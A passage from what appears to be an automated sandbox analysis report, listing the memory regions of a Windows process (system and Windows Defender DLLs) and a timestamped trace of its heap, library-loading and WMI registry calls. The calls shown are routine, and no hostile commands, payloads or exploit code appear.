"c:\\program files\\windows defender\\mpclient.dll") Region: id = 2931 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2932 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2933 start_va = 0x7fffc6740000 end_va = 0x7fffc6753fff monitored = 0 entry_point = 0x7fffc67428c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2934 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2935 start_va = 0x7fffab7f0000 end_va = 0x7fffab829fff monitored = 0 entry_point = 0x7fffab80d3f0 region_type = mapped_file name = "wmitomi.dll" filename = "\\Windows\\System32\\wmitomi.dll" (normalized: "c:\\windows\\system32\\wmitomi.dll") Region: id = 2936 start_va = 0x7fffbdcd0000 end_va = 0x7fffbdcf2fff monitored = 0 entry_point = 0x7fffbdcd20b0 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 2937 start_va = 0x7fffbdc70000 end_va = 0x7fffbdccffff monitored = 0 entry_point = 0x7fffbdc729d0 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 2938 start_va = 0x6f0000 end_va = 0x6f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2941 start_va = 0x700000 end_va = 0x70cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 2943 start_va = 0x700000 end_va = 0x70cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 2944 start_va = 0x700000 end_va = 0x701fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmitomi.dll.mui" filename = "\\Windows\\System32\\en-US\\wmitomi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wmitomi.dll.mui") Region: id = 2945 start_va = 0x710000 end_va = 0x713fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 2946 start_va = 0x7fffc8ac0000 end_va = 0x7fffc8ae2fff monitored = 0 entry_point = 0x7fffc8ac3700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2947 start_va = 0x12b0000 end_va = 0x132ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 2948 start_va = 0x7fffab7d0000 end_va = 0x7fffab7e7fff monitored = 0 entry_point = 0x7fffab7d8b20 region_type = mapped_file name = "msmpcom.dll" filename = "\\Program Files\\Windows Defender\\MsMpCom.dll" (normalized: "c:\\program files\\windows defender\\msmpcom.dll") Region: id = 2949 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2950 start_va = 0x710000 end_va = 0x718fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "protectionmanagement.dll.mui" filename = "\\Program Files\\Windows Defender\\en-US\\ProtectionManagement.dll.mui" (normalized: "c:\\program files\\windows defender\\en-us\\protectionmanagement.dll.mui") Region: id = 2951 start_va = 0x1330000 end_va = 0x146efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2952 start_va = 0x720000 end_va = 0x720fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 2953 start_va = 0x1470000 end_va = 0x14a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 2955 start_va = 0x730000 end_va = 0x738fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 2965 start_va = 0x730000 end_va = 0x735fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3859 start_va = 0x730000 end_va = 0x733fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 3871 start_va = 0x730000 end_va = 0x735fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3872 start_va = 0x510000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Thread: id = 253 os_tid = 0x12ac [0290.245] malloc (_Size=0x100) returned 0x751360 [0290.245] __dllonexit () returned 0x7fffbe347de0 [0290.245] __dllonexit () returned 0x7fffbe347e00 [0290.245] __dllonexit () returned 0x7fffbe347e20 [0290.246] GetProcessHeap () returned 0x510000 [0290.246] __dllonexit () returned 0x7fffbe347e30 [0290.246] GetProcessHeap () returned 0x510000 [0290.246] __dllonexit () returned 0x7fffbe347e40 [0290.246] __dllonexit () returned 0x7fffbe347e50 [0290.246] GetTickCount () returned 0x123d308 [0290.246] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0xd4 [0290.246] LoadLibraryExW (lpLibFileName="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x7fffca790000 [0290.246] GetProcAddress (hModule=0x7fffca790000, lpProcName="RegCreateKeyExW") returned 0x7fffca7b9330 [0290.247] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0xcf098, lpdwDisposition=0xcf040 | out: phkResult=0xcf098*=0x0, lpdwDisposition=0xcf040*=0x2) returned 0x5 [0290.247] GetSystemDirectoryW (in: lpBuffer=0x7fffbe3ab47c, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0290.247] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WBEM\\Logs\\" (normalized: "c:\\windows\\system32\\wbem\\logs")) returned 0x10 [0290.247] GetLastError () returned 0x0 [0290.247] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xcf0a8, lpdwDisposition=0xcf050 | out: phkResult=0xcf0a8*=0x0, lpdwDisposition=0xcf050*=0x2) returned 0x5 [0290.248] _vsnwprintf (in: _Buffer=0xcf010, _BufferCount=0x1d, _Format="%d", _ArgList=0xceff8 | out: _Buffer="1") returned 1 [0290.248] _vsnwprintf (in: _Buffer=0xcf010, _BufferCount=0x1d, _Format="%d", _ArgList=0xceff8 | out: _Buffer="65536") returned 5 [0290.248] __dllonexit () returned 0x7fffbe347e60 [0290.248] __dllonexit () returned 0x7fffbe347e70 [0290.249] __dllonexit () returned 0x7fffbe347e80 [0290.249] __dllonexit () returned 0x7fffbe347e90 [0290.249] __dllonexit () returned 0x7fffbe347ea0 [0290.249] DisableThreadLibraryCalls (hLibModule=0x7fffbe330000) returned 1 [0290.249] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x51e5b0 [0290.249] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x30) returned 0x520300 [0290.250] GetVersion () returned 0x4a61000a [0290.250] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7fffcca30000 [0290.250] GetProcAddress (hModule=0x7fffcca30000, lpProcName="EtwRegisterTraceGuidsW") returned 0x7fffcca39d50 [0290.250] EtwRegisterTraceGuidsW () returned 0x0 [0290.250] EtwRegisterTraceGuidsW () returned 0x0 [0290.251] GetProcAddress (hModule=0x7fffca790000, lpProcName="RegOpenKeyExW") returned 0x7fffca7bc580 [0290.251] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM", ulOptions=0x0, samDesired=0x20019, phkResult=0xcf0e8 | out: phkResult=0xcf0e8*=0xe0) returned 0x0 [0290.251] GetProcAddress (hModule=0x7fffca790000, lpProcName="RegQueryValueExW") returned 0x7fffca7bc860 [0290.251] RegQueryValueExW (in: hKey=0xe0, lpValueName="AmsiEnable", lpReserved=0x0, lpType=0xcf0c0, lpData=0xcf110, lpcbData=0xcf0d8*=0x4 | out: lpType=0xcf0c0*=0x0, lpData=0xcf110*=0x1, lpcbData=0xcf0d8*=0x4) returned 0x2 [0290.252] GetProcAddress (hModule=0x7fffca790000, lpProcName="RegCloseKey") returned 0x7fffca7bdc60 [0290.252] RegCloseKey (hKey=0xe0) returned 0x0 [0290.689] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d540) returned 1 [0290.698] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4) returned 0x527fa0 [0290.699] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5409f0) returned 1 [0290.762] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-0.dll", hFile=0x0, dwFlags=0x8) returned 0x7fffca790000 [0290.762] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x7fffca790000 [0290.762] GetProcAddress (hModule=0x7fffca790000, lpProcName="GetThreadPreferredUILanguages") returned 0x7fffca7fde70 [0290.762] GetProcAddress (hModule=0x7fffca790000, lpProcName="SetThreadPreferredUILanguages") returned 0x7fffca7f9ff0 [0290.762] GetProcAddress (hModule=0x7fffca790000, lpProcName="LocaleNameToLCID") returned 0x7fffca7f1010 [0290.762] GetProcAddress (hModule=0x7fffca790000, lpProcName="GetLocaleInfoEx") returned 0x7fffca7af830 [0290.762] GetProcAddress (hModule=0x7fffca790000, lpProcName="LCIDToLocaleName") returned 0x7fffca7c3d10 [0290.762] GetProcAddress (hModule=0x7fffca790000, lpProcName="GetSystemDefaultLocaleName") returned 0x7fffca80d700 [0290.763] RtlRestoreLastWin32Error () returned 0x0 [0290.763] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xcfb3c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcf9c0 | out: pulNumLanguages=0xcfb3c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcf9c0) returned 1 [0290.763] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x53d440 [0290.763] RtlRestoreLastWin32Error () returned 0x374000 [0290.763] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xcfb3c, pwszLanguagesBuffer=0x53d440, pcchLanguagesBuffer=0xcf9c0 | out: pulNumLanguages=0xcfb3c, pwszLanguagesBuffer=0x53d440, pcchLanguagesBuffer=0xcf9c0) returned 1 [0290.763] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x53d3e0 [0290.763] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0290.764] LocaleNameToLCID (lpName="en", dwFlags=0x0) returned 0x409 [0290.764] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d440) returned 1 [0290.783] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0290.786] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d620) returned 1 [0290.786] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d3e0) returned 1 [0290.786] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540a50) returned 1 [0290.786] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x527fa0) returned 1 [0290.788] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540480) returned 1 [0290.832] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x208) returned 0x0 [0290.832] RegQueryValueExW (in: hKey=0x208, lpValueName="EnableObjectValidation", lpReserved=0x0, lpType=0xce940, lpData=0xce950, lpcbData=0xce944*=0x19 | out: lpType=0xce940*=0x0, lpData=0xce950*=0xd8, lpcbData=0xce944*=0x19) returned 0x2 [0290.832] RegCloseKey (hKey=0x208) returned 0x0 [0290.832] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5508b0) returned 1 [0290.832] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d3e0) returned 1 [0290.832] ResolveDelayLoadedAPI () returned 0x7fffcb35c190 [0290.833] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x556f00) returned 1 [0290.835] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550910) returned 1 [0290.835] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d560) returned 1 [0290.835] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x556f00) returned 1 [0290.840] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5509a0) returned 1 [0290.840] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d3e0) returned 1 [0290.841] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x556fd0) returned 1 [0290.842] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54de40) returned 1 [0290.842] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x553600) returned 1 [0290.842] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d840) returned 1 Thread: id = 254 os_tid = 0xa98 Thread: id = 255 os_tid = 0xb4c Thread: id = 256 os_tid = 0xd34 Thread: id = 257 os_tid = 0xed4 Thread: id = 258 os_tid = 0x165c [0290.965] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d800) returned 1 [0290.967] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x90) returned 0x54c4e0 [0290.967] memcpy (in: _Dst=0x54c4e0, _Src=0x55d8f0, _Size=0x40 | out: _Dst=0x54c4e0) returned 0x54c4e0 [0290.968] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0290.969] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0290.976] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x53d800) returned 1 [0290.977] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5627b0) returned 1 [0290.978] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55de50) returned 1 [0291.345] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550910) returned 1 [0291.345] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5509a0) returned 1 [0291.345] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540a50) returned 1 [0291.345] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540480) returned 1 [0291.346] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540600) returned 1 [0291.346] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540630) returned 1 [0291.346] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x540660) returned 1 [0291.346] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dc40) returned 1 [0291.346] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dd90) returned 1 [0291.346] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e210) returned 1 [0291.346] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e330) returned 1 [0291.347] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e030) returned 1 [0291.347] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55de80) returned 1 [0291.347] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e180) returned 1 [0291.347] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dfd0) returned 1 [0291.347] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dee0) returned 1 [0291.347] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55de20) returned 1 [0291.348] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54c4e0) returned 1 [0291.348] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55d8b0) returned 1 [0389.352] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b1a50) returned 1 [0389.357] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b1eb0) returned 1 [0389.357] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b60d0) returned 1 [0389.361] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x579db0) returned 1 [0389.363] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5467a0) returned 1 [0389.363] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x579930) returned 1 [0389.367] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x57f040) returned 1 [0389.367] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5bd2a0) returned 1 [0389.369] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5bd980) returned 1 [0389.369] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x569150) returned 1 [0389.424] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54e080) returned 1 [0389.424] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55ebf0) returned 1 [0389.425] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dd00) returned 1 [0389.426] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e2a0) returned 1 [0389.427] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dd30) returned 1 [0389.427] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55deb0) returned 1 [0389.427] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e0c0) returned 1 [0389.427] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e090) returned 1 [0389.427] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e1b0) returned 1 [0389.427] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dd60) returned 1 [0389.427] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55df10) returned 1 [0389.428] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e2d0) returned 1 [0389.428] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e300) returned 1 [0389.428] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dc70) returned 1 [0389.428] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e060) returned 1 [0389.428] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e0f0) returned 1 [0389.428] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55de50) returned 1 [0389.428] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55dfa0) returned 1 [0389.428] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e120) returned 1 [0389.429] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54d0c0) returned 1 [0389.429] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x556970) returned 1 [0389.429] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x528090) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x555fa0) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562710) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5626b0) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54e110) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562490) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562390) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54d300) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562730) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562770) returned 1 [0389.430] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54d390) returned 1 [0389.431] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x551e70) returned 1 [0389.431] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562250) returned 1 [0389.431] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5625b0) returned 1 [0389.431] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54d930) returned 1 [0389.431] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562000) returned 1 [0389.432] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54d8a0) returned 1 [0389.432] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55f190) returned 1 [0389.432] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5651f0) returned 1 Thread: id = 259 os_tid = 0x480 [0389.437] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x555280) returned 1 [0389.437] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550c10) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x555be0) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x552e20) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550be0) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x555410) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x553c00) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550bb0) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5556e0) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x54ddb0) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550970) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x555690) returned 1 [0389.438] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5559b0) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550d60) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5554b0) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x553540) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524c60) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51c5a0) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x554f20) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5520b0) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524b20) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5545f0) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524ad0) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524df0) returned 1 [0389.439] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x554660) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x551870) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524a80) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x554430) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524a30) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x547c40) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524940) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524990) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550a90) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550b20) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5248a0) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550a60) returned 1 [0389.440] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550b80) returned 1 [0389.441] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524800) returned 1 [0389.441] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550a00) returned 1 [0389.441] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550940) returned 1 [0389.441] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5247b0) returned 1 [0389.441] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550d30) returned 1 [0389.442] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550760) returned 1 [0389.442] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524760) returned 1 [0389.442] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550730) returned 1 [0389.442] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550c40) returned 1 [0389.442] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x525480) returned 1 [0389.442] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5253e0) returned 1 [0389.442] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x550c70) returned 1 [0389.442] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x524cb0) returned 1 Thread: id = 260 os_tid = 0x954 [0290.982] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x562850) returned 1 [0290.983] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x90) returned 0x54d0c0 [0290.983] memcpy (in: _Dst=0x54d0c0, _Src=0x5569b0, _Size=0x40 | out: _Dst=0x54d0c0) returned 0x54d0c0 [0290.989] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55e1e0) returned 1 [0290.989] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, 